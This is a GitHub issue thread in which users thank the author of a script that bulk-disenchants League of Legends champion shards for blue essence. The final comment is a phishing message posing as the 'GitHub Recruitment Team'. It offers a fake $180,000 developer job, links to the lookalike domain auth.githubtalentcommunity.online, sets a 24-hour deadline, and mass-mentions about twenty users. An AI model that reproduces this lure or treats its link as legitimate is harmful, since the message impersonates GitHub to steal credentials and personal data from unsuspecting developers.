### ISSUE TITLE
It works! Just saved me hours of work disenchanting 150k+ blue essence.

### ISSUE THREAD

**Issue by etherealite** [Anujan/disenchant-champ-shards#1]
Spread the word, this script deserves more attention.

**Comment by LightDarkPhoton** [comment]
Agreed. Such a great script. And it is strange how the Riot API gives you so much control over the loot boxes, but they haven't implemented this feature themselves yet.

**Comment by MonsignorEduardo** [comment]
It still works just tried it.

**Comment by gitgud5000** [comment]
![ChefsKissFrenchChefGIF](https://user-images.githubusercontent.com/17186026/196083243-c0e79b6e-1f40-45e4-a6c2-4043f055da19.gif)

**Comment by OoDeLally** [comment]
Thanks, you saved me at least two hours!

**Comment by ThomasJuhasz** [comment]
confirmed, worked perfectly! many years' worth of shards broken down in 15 seconds... 410k points! :)
Thank you!!!

**Comment by acorn3x3** [comment]
confirmed works like a charm!

**Comment by H4wk-eye** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
santoshgistto, @kielabokkie, @robustfengbin, @eliyastein, @profikid, @msheakoski, @urdarinda, @nihuo, @jonrh, @brightlkms, @pkuphy, @serkanh, @yangchenglong11, @hemant6488, @techguy-bhushan, @jadbox, @mrinalwadhwa, @MarkTangCd, @maxgfr, @sborod
